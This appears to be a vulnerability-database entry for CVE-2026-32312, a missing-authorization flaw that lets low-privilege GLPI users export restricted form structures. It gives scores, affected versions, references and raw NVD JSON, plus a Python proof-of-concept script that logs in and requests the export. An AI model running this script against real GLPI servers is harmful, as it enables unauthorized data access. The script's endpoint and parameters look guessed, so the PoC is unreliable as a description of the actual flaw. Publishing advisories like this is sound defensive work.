CVE-2026-32312

Description

GLPI is a free asset and IT management software package. In versions 11.0.0 through 11.0.6, an authenticated user with forms READ permission can export the structure of unauthorized forms. This issue has been fixed in version 11.0.7.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* - VULNERABLE

GLPI 11.0.0

GLPI 11.0.1

GLPI 11.0.2

GLPI 11.0.3

GLPI 11.0.4

GLPI 11.0.5

GLPI 11.0.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit_glpi_cve(target, username, password, form_id):
    """
    PoC for CVE-2026-32312
    Exploits unauthorized form structure export in GLPI 11.0.0-11.0.6
    """
    session = requests.Session()

    # 1. Authentication
    login_url = f"{target}/front/login.php"
    auth_data = {
        "login_name": username,
        "login_password": password,
        "submit": "Post"
    }
    session.post(login_url, data=auth_data)

    # 2. Exploit Attempt - Export Unauthorized Form
    # Note: Endpoint might vary based on GLPI configuration, typically /front/form.form.php
    export_url = f"{target}/front/form.form.php"
    params = {
        "action": "export",  # Specific action to trigger the export
        "id": form_id         # Target form ID that the user should not have access to
    }

    response = session.get(export_url, params=params)

    if response.status_code == 200 and "structure" in response.text:
        print(f"[+] Successfully exported form ID {form_id}:")
        print(response.text[:500]) # Print first 500 chars
    else:
        print(f"[-] Failed to export form or access denied.")

if __name__ == "__main__":
    TARGET = "http://127.0.0.1/glpi"
    USER = "low_priv_user"
    PASS = "user_pass"
    TARGET_FORM_ID = "2" # ID of a restricted form
    exploit_glpi_cve(TARGET, USER, PASS, TARGET_FORM_ID)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32312
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32312
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32312/
[4] VulDB https://vuldb.com/cve/CVE-2026-32312
[5] https://github.com/glpi-project/glpi/releases/tag/11.0.7
[6] https://github.com/glpi-project/glpi/security/advisories/GHSA-cg63-qchq-q626

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32312", "sourceIdentifier": "[email protected]", "published": "2026-05-19T00:16:37.283", "lastModified": "2026-05-21T23:57:48.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GLPI is a free asset and IT management software package. In versions 11.0.0 through 11.0.6, an authenticated user with forms READ permission can export the structure of unauthorized forms. This issue has been fixed in version 11.0.7."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.7", "matchCriteriaId": "309CFFFD-1C2C-461B-887E-0C5380CA9618"}]}]}], "references": [{"url": "https://github.com/glpi-project/glpi/releases/tag/11.0.7", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/glpi-project/glpi/security/advisories/GHSA-cg63-qchq-q626", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}